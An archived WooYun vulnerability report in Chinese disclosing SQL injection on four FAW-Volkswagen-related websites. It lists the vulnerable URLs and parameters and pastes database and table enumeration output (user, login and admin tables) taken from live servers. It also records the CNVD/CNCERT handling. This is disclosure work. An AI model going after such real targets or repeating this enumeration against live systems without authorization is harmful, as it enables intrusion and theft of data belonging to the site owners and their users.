漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-089434
漏洞标题:一汽大众多个站点SQL注射
相关厂商:一汽大众
漏洞作者: 勿忘初心
提交时间:2014-12-31 16:19
修复时间:2015-02-14 16:20
公开时间:2015-02-14 16:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-12-31: 细节已通知厂商并且等待厂商处理中
2015-01-05: 厂商已经确认,细节仅向厂商公开
2015-01-15: 细节向核心白帽子及相关领域专家公开
2015-01-25: 细节向普通白帽子公开
2015-02-04: 细节向实习白帽子公开
2015-02-14: 细节向公众公开
简要描述:
一汽大众多个站点SQL注射
详细说明:
一汽大众某站SQL注射#1
http://www.sftm.com.cn/event_detail.asp?ClassID=0204&id=839
---
Database: tempdb
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: msdb
[78 tables]
+--------------------------------------------------+
| dbo.RTblClassDefs |
| dbo.RTblClassExtension |
| dbo.RTblDBMProps |
| dbo.RTblDBXProps |
| dbo.RTblDTMProps |
| dbo.RTblDTSProps |
| dbo.RTblDatabaseVersion |
| dbo.RTblEQMProps |
| dbo.RTblEnumerationDef |
| dbo.RTblEnumerationValueDef |
| dbo.RTblGENProps |
| dbo.RTblIfaceDefs |
| dbo.RTblIfaceHier |
| dbo.RTblIfaceMem |
| dbo.RTblMDSProps |
| dbo.RTblNamedObj |
| dbo.RTblOLPProps |
| dbo.RTblParameterDef |
| dbo.RTblPropDefs |
| dbo.RTblProps |
| dbo.RTblRelColDefs |
| dbo.RTblRelshipDefs |
| dbo.RTblRelshipProps |
| dbo.RTblRelships |
| dbo.RTblSIMProps |
| dbo.RTblScriptDefs |
| dbo.RTblSites |
| dbo.RTblSumInfo |
| dbo.RTblTFMProps |
| dbo.RTblTypeInfo |
| dbo.RTblTypeLibs |
| dbo.RTblUMLProps |
| dbo.RTblUMXProps |
| dbo.RTblVersionAdminInfo |
| dbo.RTblVersions |
| dbo.RTblWorkspaceItems |
| dbo.backupfile |
| dbo.backupmediafamily |
| dbo.backupmediaset |
| dbo.backupset |
| dbo.log_shipping_primaries |
| dbo.log_shipping_secondaries |
| dbo.logmarkhistory |
| dbo.mswebtasks |
| dbo.restorefile |
| dbo.restorefilegroup |
| dbo.restorehistory |
| dbo.sqlagent_info |
| dbo.sysalerts |
| dbo.syscachedcredentials |
| dbo.syscategories |
| dbo.sysconstraints |
| dbo.sysdbmaintplan_databases |
| dbo.sysdbmaintplan_history |
| dbo.sysdbmaintplan_jobs |
| dbo.sysdbmaintplans |
| dbo.sysdownloadlist |
| dbo.sysdtscategories |
| dbo.sysdtspackagelog |
| dbo.sysdtspackages |
| dbo.sysdtssteplog |
| dbo.sysdtstasklog |
| dbo.sysjobhistory |
| dbo.sysjobs |
| dbo.sysjobs_view |
| dbo.sysjobschedules |
| dbo.sysjobservers |
| dbo.sysjobsteps |
| dbo.sysnotifications |
| dbo.sysoperators |
| dbo.syssegments |
| dbo.systargetservergroupmembers |
| dbo.systargetservergroups |
| dbo.systargetservers |
| dbo.systargetservers_view |
| dbo.systaskids |
| dbo.systasks |
| dbo.systasks_view |
+--------------------------------------------------+
Database: pubs
[15 tables]
+--------------------------------------------------+
| dbo.authors |
| dbo.discounts |
| dbo.dtproperties |
| dbo.employee |
| dbo.jobs |
| dbo.pub_info |
| dbo.publishers |
| dbo.roysched |
| dbo.sales |
| dbo.stores |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.titleauthor |
| dbo.titles |
| dbo.titleview |
+--------------------------------------------------+
Database: sftm
[30 tables]
+--------------------------------------------------+
| dbo.Clicks |
| dbo.D99_CMD |
| dbo.D99_REG |
| dbo.D99_Tmp |
| dbo.S3_Tmp |
| dbo.SYSLOG |
| dbo.VIEWUsers |
| dbo.dtproperties |
| dbo.jDegree |
| dbo.jPersonBase |
| dbo.jPersonExperience |
| dbo.jfamilyrelation |
| dbo.member |
| dbo.sqlmapoutput |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.template |
| dbo.uCompany |
| dbo.uDepartment |
| dbo.uFirstMenu |
| dbo.uNews |
| dbo.uNewsView |
| dbo.uParameter |
| dbo.uPur |
| dbo.uPurperse |
| dbo.uSecondMenu |
| dbo.uUserType |
| dbo.uUsers |
| dbo.uViewpoint |
| dbo.upload |
+--------------------------------------------------+
Database: TRSIP
[35 tables]
+--------------------------------------------------+
| dbo.BOOK |
| dbo.BOOK_BAK |
| dbo.BookAppendix |
| dbo.ChinaZap_0 |
| dbo.ChinaZap_0_Extra |
| dbo.ChinaZap_0_Rights |
| dbo.ChinaZap_2 |
| dbo.ChinaZap_3 |
| dbo.ChinaZap_4 |
| dbo.ContentHyperLink |
| dbo.Counter |
| dbo.DataRelations |
| dbo.ExtraFields |
| dbo.IPSYSCONFIG |
| dbo.IPSYSMASTER |
| dbo.IPSYSRIGHTS |
| dbo.InfoPubLogs |
| dbo.NewsFrom |
| dbo.Pictures |
| dbo.Sheet2$ |
| dbo.Syslogin |
| dbo.SystemRoles |
| dbo.Templates |
| dbo.UserInfo |
| dbo.[%B5%D8%CD%BC] |
| dbo.[%B9%CA%D5%CF%CE%AC%BB%A4] |
| dbo.[%C5%E4%D6%C3%C7%E5%B5%A5] |
| dbo.[%C9%E8%B1%B8%B5%B5%B0%B8] |
| dbo.[%CE%AC%D0%DE%B5%B5%B0%B8] |
| dbo.[%D2%C0%C0%B5%B1%ED] |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tbStatus |
| dbo.updateinfo |
+--------------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------------+
| dbo.MSreplication_options |
| dbo.[INFORMATION_SCHEMA.CHECK_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.COLUMNS] |
| dbo.[INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE] |
| dbo.[INFORMATION_SCHEMA.COLUMN_PRIVILEGES] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE] |
| dbo.[INFORMATION_SCHEMA.DOMAINS] |
| dbo.[INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.KEY_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.PARAMETERS] |
| dbo.[INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.ROUTINES] |
| dbo.[INFORMATION_SCHEMA.ROUTINE_COLUMNS] |
| dbo.[INFORMATION_SCHEMA.SCHEMATA] |
| dbo.[INFORMATION_SCHEMA.TABLES] |
| dbo.[INFORMATION_SCHEMA.TABLE_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.TABLE_PRIVILEGES] |
| dbo.[INFORMATION_SCHEMA.VIEWS] |
| dbo.[INFORMATION_SCHEMA.VIEW_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.VIEW_TABLE_USAGE] |
| dbo.spt_datatype_info |
| dbo.spt_datatype_info_ext |
| dbo.spt_fallback_db |
| dbo.spt_fallback_dev |
| dbo.spt_fallback_usg |
| dbo.spt_monitor |
| dbo.spt_provider_types |
| dbo.spt_server_info |
| dbo.spt_values |
| dbo.sysconstraints |
| dbo.syslogins |
| dbo.sysoledbusers |
| dbo.sysopentapes |
| dbo.sysremotelogins |
| dbo.syssegments |
+--------------------------------------------------+
Database: ISO
[25 tables]
+--------------------------------------------------+
| dbo.Clicks |
| dbo.SYSLOG |
| dbo.VIEWUsers |
| dbo.dtproperties |
| dbo.jDegree |
| dbo.jPersonBase |
| dbo.jPersonExperience |
| dbo.jfamilyrelation |
| dbo.member |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.template |
| dbo.uCompany |
| dbo.uDepartment |
| dbo.uFirstMenu |
| dbo.uNews |
| dbo.uNewsView |
| dbo.uParameter |
| dbo.uPur |
| dbo.uPurperse |
| dbo.uSecondMenu |
| dbo.uUserType |
| dbo.uUsers |
| dbo.uViewpoint |
| dbo.upload |
+--------------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: Northwind
[32 tables]
+--------------------------------------------------+
| dbo.Categories |
| dbo.CustomerCustomerDemo |
| dbo.CustomerDemographics |
| dbo.Customers |
| dbo.EmployeeTerritories |
| dbo.Employees |
| dbo.Invoices |
| dbo.Region |
| dbo.Shippers |
| dbo.Suppliers |
| dbo.Territories |
| dbo.[Alphabetical%20list%20of%20products] |
| dbo.[Category%20Sales%20for%201997] |
| dbo.[Current%20Product%20List] |
| dbo.[Customer%20and%20Suppliers%20by%20City] |
| dbo.[Order%20Details%20Extended] |
| dbo.[Order%20Details%20Extended] |
| dbo.[Order%20Subtotals] |
| dbo.[Orders%20Qry] |
| dbo.[Orders%20Qry] |
| dbo.[Product%20Sales%20for%201997] |
| dbo.[Products%20Above%20Average%20Price] |
| dbo.[Products%20Above%20Average%20Price] |
| dbo.[Products%20by%20Category] |
| dbo.[Quarterly%20Orders] |
| dbo.[Sales%20Totals%20by%20Amount] |
| dbo.[Sales%20by%20Category] |
| dbo.[Summary%20of%20Sales%20by%20Quarter] |
| dbo.[Summary%20of%20Sales%20by%20Year] |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: EnglishFT
[25 tables]
+--------------------------------------------------+
| dbo.Clicks |
| dbo.SYSLOG |
| dbo.VIEWUsers |
| dbo.dtproperties |
| dbo.jDegree |
| dbo.jPersonBase |
| dbo.jPersonExperience |
| dbo.jfamilyrelation |
| dbo.member |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.template |
| dbo.uCompany |
| dbo.uDepartment |
| dbo.uFirstMenu |
| dbo.uNews |
| dbo.uNewsView |
| dbo.uParameter |
| dbo.uPur |
| dbo.uPurperse |
| dbo.uSecondMenu |
| dbo.uUserType |
| dbo.uUsers |
| dbo.uViewpoint |
| dbo.upload |
+--------------------------------------------------+
一汽大众某站SQL注射#2
http://service.faw-mazda.com/Spareparts/index.php/shangkujingpin_ryjc/detail?id=329
Database: mazda_servicemore
[9 tables]
+---------------------------------------+
| tActivity |
| tAgency |
| tBook |
| tJoin |
| tPatrol |
| tSession |
| tTags |
| tUser |
| tWords |
+---------------------------------------+
Database: mazda_chebeipin
[18 tables]
+---------------------------------------+
| demo_admins |
| demo_archivecontent |
| demo_archivecontent_20141212 |
| demo_archives |
| demo_archives_20141212 |
| demo_arctype |
| demo_beipinprice |
| demo_channeltype |
| demo_city |
| demo_dealers |
| demo_drive |
| demo_ebook |
| demo_ebookpic |
| demo_loginlog |
| demo_province |
| demo_roles |
| demo_setting |
| demo_table |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
漏洞证明:
一汽大众某站SQL注射#3
http://www.faw-foundry.com.cn/qydt.jsp?typeid=1&where=xxdt
一汽大众某站SQL注射#4
http://www.fawjiefang.com.cn/zplist.jsp?id=209
修复方案:
NUll
版权声明:转载请注明来源 勿忘初心@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-01-05 08:17
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给吉林分中心,由其后续协调网站管理单位处置.
最新状态:
暂无